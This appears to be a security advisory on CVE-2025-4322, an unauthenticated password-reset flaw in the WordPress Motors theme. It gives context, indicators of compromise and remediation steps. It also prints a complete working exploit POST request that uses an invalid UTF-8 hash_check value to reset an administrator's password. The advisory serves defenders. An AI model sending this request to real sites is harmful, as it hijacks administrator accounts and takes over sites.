Critical Vulnerability in the WordPress Theme Motors: Widespread Exploitation to Hijack Administrator Accounts - Seckhmet

A critical privilege escalation vulnerability (CVE-2025-4322) in the WordPress Motors theme is being actively exploited to take full control of WordPress sites. Discovered in early May 2025, this flaw allows an unauthenticated attacker to change the password of any user—including an administrator—without any prior authorization.

Context

Developed by StylemixThemes, the Motors theme is used by over 22,000 WordPress websites, primarily in the automotive sector. It includes advanced modules for account management, form handling, and classified ad search functionalities.

The vulnerable component is located in the “Login Register” widget, which is enabled on many websites through pages such as /reset-password, /account, or /signin.

Vulnerability Details

The flaw relies on improper user identity verification during the password reset process. The hash_check field, insufficiently sanitized, can be manipulated using invalid UTF-8 characters to bypass the hash verification logic within the theme.

Once the check is bypassed, the attacker submits a stm_new_password field in the POST request along with a user_id pointing to an administrator account. This triggers a direct password reset without any email validation or secure token.

Example de POST malveillant

POST /index.php/login-register/?user_id=3&hash_check=%80 HTTP/1.1
Host: [redacted]
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36
Content-Type: application/x-www-form-urlencoded
 
stm_new_password=Testtest123%21%40%23

Result: the attacker can immediately log in using the newly defined password.

Indicators of Compromise (IOC)

Signs of exploitation of this vulnerability:

Inability for administrators to log in (invalid password)
Appearance of new administrator accounts in the back office
Suspicious logins from malicious IP addresses
Modified PHP files or unusual behavior in the dashboard

Remediation Measures

Immediately update the Motors theme to version 5.6.68 or higher

Reset all user passwords

Delete all unknown or recently created accounts

Implement multi-factor authentication (MFA)

Search the logs for abnormal POST requests to /reset-password or /login-register